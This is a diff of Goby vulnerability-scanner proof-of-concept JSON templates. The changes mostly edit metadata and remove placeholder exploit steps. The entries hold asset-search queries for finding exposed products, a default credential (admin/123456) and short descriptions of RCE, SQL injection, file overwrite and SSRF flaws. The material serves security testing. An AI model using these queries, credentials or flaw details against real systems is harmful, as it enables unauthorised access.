129		-	"bz": ""
130		-	}
131		-	]
132		-	},
133		-	"SetVariable": [
134		-	"output\|lastbody\|regex\|"
135		-	]
136		-	}
137		-	],
138		-	"PostTime": "0000-00-00 00:00:00",
139		-	"GobyVersion": "0.0.0"
	101	+	"PostTime": "2021-12-04 18:32:14",
	102	+	"GobyVersion": "1.9.310"
140	103		}

lib/goby/goby_pocs/ClusterEngineV4.0_RCE_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/ClusterEngine_V4.0_Shell_cluster_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Coldfusion_LFI_CVE_2010_2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Confluence_RCE_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Consul_Rexec_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 4 lines
5	5		"rce"
6	6		],
7	7		"GobyQuery": "protocol=\"consul(http)\"",
8		-	"Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.",
	8	+	"Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request",
9	9		"Product": "Consul",
10	10		"Homepage": "https://www.consul.io/",
11		-	"Author": "",
12		-	"Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://www.exploit-db.com/exploits/46073"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 36 lines
57	57		]
58	58		}
59	59		],
60		-	"ExploitSteps": [
61		-	"AND",
62		-	{
63		-	"Request": {
64		-	"method": "GET",
65		-	"uri": "/test.php",
66		-	"follow_redirect": true,
67		-	"header": null,
68		-	"data_type": "text",
69		-	"data": "",
70		-	"set_variable": []
71		-	},
72		-	"ResponseTest": {
73		-	"type": "group",
74		-	"operation": "AND",
75		-	"checks": [
76		-	{
77		-	"type": "item",
78		-	"variable": "$code",
79		-	"operation": "==",
80		-	"value": "200",
81		-	"bz": ""
82		-	},
83		-	{
84		-	"type": "item",
85		-	"variable": "$body",
86		-	"operation": "contains",
87		-	"value": "test",
88		-	"bz": ""
89		-	}
90		-	]
91		-	},
92		-	"SetVariable": [
93		-	"output\|lastbody\|regex\|"
94		-	]
95		-	}
96		-	],
97		-	"PostTime": "0000-00-00 00:00:00",
98		-	"GobyVersion": "0.0.0"
	60	+	"PostTime": "2021-11-08 21:46:25",
	61	+	"GobyVersion": "1.8.302"
99	62		}

lib/goby/goby_pocs/Coremail_Config_Disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Coremail_configuration_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CouchCMS_Infoleak_CVE-2018-7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Couch_CMS_Infoleak_CVE_2018_7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Couchdb_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CraftCMS_SEOmatic_Server-Side_Template_Injection_CVE-2020-9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CraftCMS_Seomatic_RCE_CVE_2020_9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link AC集中管理系统默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link DCS系列监控 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link DCS系列监控账号密码信息泄露漏洞 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_AC_management_system_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_DCS_2530L_Administrator_password_disclosure_CVE_2020_25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_DIR-850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_DIR_868L_x_DIR_817LW_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_Info_Leak_CVE-2019-17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D-Link_ShareCenter_DNS_320_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D_Link_AC_Centralized_management_system__Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D_Link_DC_Disclosure_of_account_password_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D_Link_DIR_868L_getcfg.php_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/D_Link_ShareCenter_DNS_320_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Datang_AC_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"defaultaccount"
6	6		],
7		-	"GobyQuery": "app=\"大唐电信AC集中管理平台\" \|\| title=\"大唐电信AC集中管理平台\"",
8		-	"Description": "",
9		-	"Product": "Datang Telecom AC centralized management platform",
	7	+	"GobyQuery": "(app=\"大唐电信AC集中管理平台\" \| title=\"大唐电信AC集中管理平台\")",
	8	+	"Description": "大唐AC集中管理平台默认密码admin/123456",
	9	+	"Product": "大唐电信AC集中管理平台",
10	10		"Homepage": "http://www.datang.com/",
11		-	"Author": "",
12		-	"Impact": "Datang AC centralized management platform default password admin/123456",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [],
15	15		"HasExp": true,
		skipped 83 lines
99	99		]
100	100		}
101	101		],
102		-	"PostTime": "0000-00-00 00:00:00",
103		-	"GobyVersion": "0.0.0"
	102	+	"PostTime": "2021-11-12 19:44:34",
	103	+	"GobyVersion": "1.8.302"
104	104		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/DedeCMS_Carbuyaction_FileInclude.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 4 lines
5	5		"FileInclude"
6	6		],
7	7		"GobyQuery": "app=\"DedeCMS\"",
8		-	"Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
	8	+	"Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞",
9	9		"Product": "DedeCMS",
10	10		"Homepage": "http://www.dedecms.com/",
11		-	"Author": "",
12		-	"Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://www.cnblogs.com/milantgh/p/3615986.html"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 67 lines
88	88		]
89	89		}
90	90		],
91		-	"ExploitSteps": [
92		-	"AND",
93		-	{
94		-	"Request": {
95		-	"method": "GET",
96		-	"uri": "/test.php",
97		-	"follow_redirect": true,
98		-	"header": null,
99		-	"data_type": "text",
100		-	"data": "",
101		-	"set_variable": []
102		-	},
103		-	"ResponseTest": {
104		-	"type": "group",
105		-	"operation": "AND",
106		-	"checks": [
107		-	{
108		-	"type": "item",
109		-	"variable": "$code",
110		-	"operation": "==",
111		-	"value": "200",
112		-	"bz": ""
113		-	},
114		-	{
115		-	"type": "item",
116		-	"variable": "$body",
117		-	"operation": "contains",
118		-	"value": "test",
119		-	"bz": ""
120		-	}
121		-	]
122		-	},
123		-	"SetVariable": [
124		-	"output\|lastbody\|regex\|"
125		-	]
126		-	}
127		-	],
128		-	"PostTime": "0000-00-00 00:00:00",
129		-	"GobyVersion": "0.0.0"
	91	+	"PostTime": "2021-11-13 14:18:50",
	92	+	"GobyVersion": "1.8.302"
130	93		}

lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE-2018-6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE_2018_6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Discuz!ML_3.x_RCE_CNVD-2019-22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Discuz_ML_3.x_RCE__CNVD_2019_22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Discuz_RCE_WOOYUN_2010_080723.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"rce"
6	6		],
7		-	"GobyQuery": "app=\"Discuz\" \|\| body=\"Powered by Discuz!\"",
8		-	"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
9		-	"Product": "Discuz!",
	7	+	"GobyQuery": "(app=\"Discuz\" \| body=\"Powered by Discuz!\")",
	8	+	"Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致$_REQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。",
	9	+	"Product": "discuz",
10	10		"Homepage": "https://www.discuz.net/",
11		-	"Author": "",
12		-	"Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 45 lines
66	66		]
67	67		}
68	68		],
69		-	"ExploitSteps": [
70		-	"AND",
71		-	{
72		-	"Request": {
73		-	"method": "GET",
74		-	"uri": "/test.php",
75		-	"follow_redirect": true,
76		-	"header": null,
77		-	"data_type": "text",
78		-	"data": "",
79		-	"set_variable": []
80		-	},
81		-	"ResponseTest": {
82		-	"type": "group",
83		-	"operation": "AND",
84		-	"checks": [
85		-	{
86		-	"type": "item",
87		-	"variable": "$code",
88		-	"operation": "==",
89		-	"value": "200",
90		-	"bz": ""
91		-	},
92		-	{
93		-	"type": "item",
94		-	"variable": "$body",
95		-	"operation": "contains",
96		-	"value": "test",
97		-	"bz": ""
98		-	}
99		-	]
100		-	},
101		-	"SetVariable": [
102		-	"output\|lastbody\|regex\|"
103		-	]
104		-	}
105		-	],
106		-	"PostTime": "0000-00-00 00:00:00",
107		-	"GobyVersion": "0.0.0"
	69	+	"PostTime": "2021-11-17 13:57:54",
	70	+	"GobyVersion": "1.8.302"
108	71		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Discuz_Wechat_Plugins_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"unauth"
6	6		],
7		-	"GobyQuery": "app=\"Discuz\" \|\| body=\"Powered by Discuz!\"",
8		-	"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
9		-	"Product": "Discuz!",
	7	+	"GobyQuery": "(app=\"Discuz\" \| body=\"Powered by Discuz!\")",
	8	+	"Description": "由Discuz论坛官方微信登录插件产生，攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号，通过该漏洞创建的论坛账号具备一般用户的所有权限，可以任意发帖回帖.",
	9	+	"Product": "discuz",
10	10		"Homepage": "https://www.discuz.net/",
11		-	"Author": "",
12		-	"Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 57 lines
78	78		]
79	79		}
80	80		],
81		-	"ExploitSteps": [
82		-	"AND",
83		-	{
84		-	"Request": {
85		-	"method": "GET",
86		-	"uri": "/test.php",
87		-	"follow_redirect": true,
88		-	"header": null,
89		-	"data_type": "text",
90		-	"data": "",
91		-	"set_variable": []
92		-	},
93		-	"ResponseTest": {
94		-	"type": "group",
95		-	"operation": "AND",
96		-	"checks": [
97		-	{
98		-	"type": "item",
99		-	"variable": "$code",
100		-	"operation": "==",
101		-	"value": "200",
102		-	"bz": ""
103		-	},
104		-	{
105		-	"type": "item",
106		-	"variable": "$body",
107		-	"operation": "contains",
108		-	"value": "test",
109		-	"bz": ""
110		-	}
111		-	]
112		-	},
113		-	"SetVariable": [
114		-	"output\|lastbody\|regex\|"
115		-	]
116		-	}
117		-	],
118		-	"PostTime": "0000-00-00 00:00:00",
119		-	"GobyVersion": "0.0.0"
	81	+	"PostTime": "2021-11-17 13:52:51",
	82	+	"GobyVersion": "1.8.302"
120	83		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Discuz_v72_SQLI.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"sqli"
6	6		],
7		-	"GobyQuery": "app=\"Discuz\" \|\| body=\"Powered by Discuz!\"",
8		-	"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
9		-	"Product": "Discuz!",
	7	+	"GobyQuery": "(app=\"Discuz\" \| body=\"Powered by Discuz!\")",
	8	+	"Description": "discuz7.2论坛存在sql注入漏洞",
	9	+	"Product": "Discuz",
10	10		"Homepage": "https://www.discuz.net/",
11		-	"Author": "",
12		-	"Impact": "Discuz7.2 has sql injection vulnerability.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://blog.csdn.net/weixin_40709439/article/details/82780606"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 43 lines
64	64		]
65	65		}
66	66		],
67		-	"ExploitSteps": [
68		-	"AND",
69		-	{
70		-	"Request": {
71		-	"method": "GET",
72		-	"uri": "/test.php",
73		-	"follow_redirect": true,
74		-	"header": null,
75		-	"data_type": "text",
76		-	"data": "",
77		-	"set_variable": []
78		-	},
79		-	"ResponseTest": {
80		-	"type": "group",
81		-	"operation": "AND",
82		-	"checks": [
83		-	{
84		-	"type": "item",
85		-	"variable": "$code",
86		-	"operation": "==",
87		-	"value": "200",
88		-	"bz": ""
89		-	},
90		-	{
91		-	"type": "item",
92		-	"variable": "$body",
93		-	"operation": "contains",
94		-	"value": "test",
95		-	"bz": ""
96		-	}
97		-	]
98		-	},
99		-	"SetVariable": [
100		-	"output\|lastbody\|regex\|"
101		-	]
102		-	}
103		-	],
104		-	"PostTime": "0000-00-00 00:00:00",
105		-	"GobyVersion": "0.0.0"
	67	+	"PostTime": "2021-11-16 17:48:16",
	68	+	"GobyVersion": "1.8.302"
106	69		}

lib/goby/goby_pocs/Dlink_850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Dlink_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Dlink_RCE_CVE_2019_16920.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/DocCMS_keyword_SQL_injection_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Docker_Registry_API_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "Docker Registry API Unauth",
3		-	"Level": "1",
	3	+	"Level": "2",
4	4		"Tags": [
5	5		"unauth"
6	6		],
7	7		"GobyQuery": "header=\"registry/2.0\"",
8		-	"Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.",
	8	+	"Description": "Docker Registry API 存在未授权访问漏洞，黑客可通过API下载docker images，导致敏感信息泄露。",
9	9		"Product": "Docker Registry",
10	10		"Homepage": "https://docs.docker.com/registry/",
11		-	"Author": "",
12		-	"Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://www.freeaihub.com/post/6085.html"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 77 lines
98	98		]
99	99		}
100	100		],
101		-	"ExploitSteps": [
102		-	"AND",
103		-	{
104		-	"Request": {
105		-	"method": "GET",
106		-	"uri": "/test.php",
107		-	"follow_redirect": true,
108		-	"header": null,
109		-	"data_type": "text",
110		-	"data": "",
111		-	"set_variable": []
112		-	},
113		-	"ResponseTest": {
114		-	"type": "group",
115		-	"operation": "AND",
116		-	"checks": [
117		-	{
118		-	"type": "item",
119		-	"variable": "$code",
120		-	"operation": "==",
121		-	"value": "200",
122		-	"bz": ""
123		-	},
124		-	{
125		-	"type": "item",
126		-	"variable": "$body",
127		-	"operation": "contains",
128		-	"value": "test",
129		-	"bz": ""
130		-	}
131		-	]
132		-	},
133		-	"SetVariable": [
134		-	"output\|lastbody\|regex\|"
135		-	]
136		-	}
137		-	],
138		-	"PostTime": "0000-00-00 00:00:00",
139		-	"GobyVersion": "0.0.0"
	101	+	"PostTime": "2021-11-27 14:21:33",
	102	+	"GobyVersion": "1.9.310"
140	103		}

lib/goby/goby_pocs/DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Eyou_Mail_System_RCE_CNVD_2021_26422.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Eyou_Mail_system_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/F5_BIG_IP_RCE_CVE_2021_22986_exp.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_API_auth_bypass_CVE_2022_1388.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_Unauthenticated_RCE_CVE_2021_22986.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Fastmeeting_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Fastmeeting Arbitrary File Read",
	2	+	"Name": "好视通云会议存在任意文件读取漏洞",
3	3		"Level": "2",
4	4		"Tags": [
5	5		"fileread"
6	6		],
7	7		"GobyQuery": "body=\"深圳银澎云计算有限公司\"",
8		-	"Description": "hst",
9		-	"Product": "hst",
	8	+	"Description": "好视通云会议存在任意文件读取漏洞",
	9	+	"Product": "好视通云会议",
10	10		"Homepage": "https://www.hst.com/",
11		-	"Author": "",
12		-	"Impact": "Fastmeeting Arbitrary File Read",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA"
		skipped 84 lines
100	100		]
101	101		}
102	102		],
103		-	"PostTime": "0000-00-00 00:00:00",
104		-	"GobyVersion": "0.0.0"
	103	+	"PostTime": "2021-12-11 14:50:39",
	104	+	"GobyVersion": "1.9.310"
105	105		}

lib/goby/goby_pocs/FineReport_Directory_traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/FineReport_v8.0_Arbitrary_file_read_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/FineReport_v8.0_Fileread_CNVD_2018_04757.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/FineReport_v8.0_v9.0_Directory_Traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/FineReport_v9_Arbitrary_File_Overwrite.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 4 lines
5	5		"overwrite"
6	6		],
7	7		"GobyQuery": "app=\"fanruansem-FineReport\"",
8		-	"Description": "FineReport is an web reporting tool.",
9		-	"Product": "fanruan-FineReport",
	8	+	"Description": "由于在初始化svg文件时，未对传入的参数做限制，导致可以对已存在的文件覆盖写入数据，从而通过将木马写入jsp文件中获取服务器权限",
	9	+	"Product": "帆软-FineReport",
10	10		"Homepage": "https://www.fanruan.com/",
11		-	"Author": "",
12		-	"Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 67 lines
88	88		]
89	89		}
90	90		],
91		-	"ExploitSteps": [
92		-	"AND",
93		-	{
94		-	"Request": {
95		-	"method": "GET",
96		-	"uri": "/test.php",
97		-	"follow_redirect": true,
98		-	"header": null,
99		-	"data_type": "text",
100		-	"data": "",
101		-	"set_variable": []
102		-	},
103		-	"ResponseTest": {
104		-	"type": "group",
105		-	"operation": "AND",
106		-	"checks": [
107		-	{
108		-	"type": "item",
109		-	"variable": "$code",
110		-	"operation": "==",
111		-	"value": "200",
112		-	"bz": ""
113		-	},
114		-	{
115		-	"type": "item",
116		-	"variable": "$body",
117		-	"operation": "contains",
118		-	"value": "test",
119		-	"bz": ""
120		-	}
121		-	]
122		-	},
123		-	"SetVariable": [
124		-	"output\|lastbody\|regex\|"
125		-	]
126		-	}
127		-	],
128		-	"PostTime": "0000-00-00 00:00:00",
129		-	"GobyVersion": "0.0.0"
	91	+	"PostTime": "2021-12-08 11:22:44",
	92	+	"GobyVersion": "1.9.310"
130	93		}

lib/goby/goby_pocs/Finetree_5MP_Network_Camera_Default_Login_unauthorized_user_add.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Finetree_5MP_default_password_or_Unauthorized_user_added.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure_CVE_2020_26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/GitLab_RCE_CVE-2021-22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/GitLab_SSRF_CVE_2021_22214.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "GitLab SSRF CVE-2021-22214",
3	3		"Level": "3",
4		-	"Tags": [
5		-	"SSRF"
6		-	],
	4	+	"Tags": [],
7	5		"GobyQuery": "app=\"GitLab\"",
8		-	"Description": "GitLab is The DevOps Platform.",
9		-	"Product": "GitLab",
10		-	"Homepage": "https://about.gitlab.com/",
11		-	"Author": "",
12		-	"Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.",
13		-	"Recommendation": "",
	6	+	"Description": "GitLab存在前台未授权SSRF漏洞，未授权的攻击者也可以利用该漏洞执行SSRF攻击（CVE-2021-22214）。该漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。",
	7	+	"Product": "Gitlab > 10.5",
	8	+	"Homepage": "https://gobies.org/",
	9	+	"Author": "luckying",
	10	+	"Impact": "",
	11	+	"Recommandation": "",
14	12		"References": [
15		-	"https://nvd.nist.gov/vuln/detail/CVE-2021-22214",
16		-	"https://nvd.nist.gov/vuln/detail/CVE-2021-39935",
17		-	"https://nvd.nist.gov/vuln/detail/CVE-2021-22175",
18		-	"https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html",
19		-	"https://docs.gitlab.com/ee/api/lint.html"
20		-	],
21		-	"HasExp": true,
22		-	"ExpParams": [
23		-	{
24		-	"Name": "URL",
25		-	"Type": "input",
26		-	"Value": "test.dnslog.cn"
27		-	}
	13	+	"https://gobies.org/"
28	14		],
29		-	"ExpTips": {
30		-	"Type": "",
31		-	"Content": ""
32		-	},
	15	+	"HasExp": true,
	16	+	"ExpParams": [
	17	+	{
	18	+	"name": "URL",
	19	+	"type": "input",
	20	+	"value": "test.dnslog.cn",
	21	+	"show": ""
	22	+	}
	23	+	],
33	24		"ScanSteps": [
34	25		"AND",
35	26		{
		skipped 3 lines
39	30		"follow_redirect": false,
40	31		"header": {
41	32		"Content-Type": "application/json",
42		-	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9"
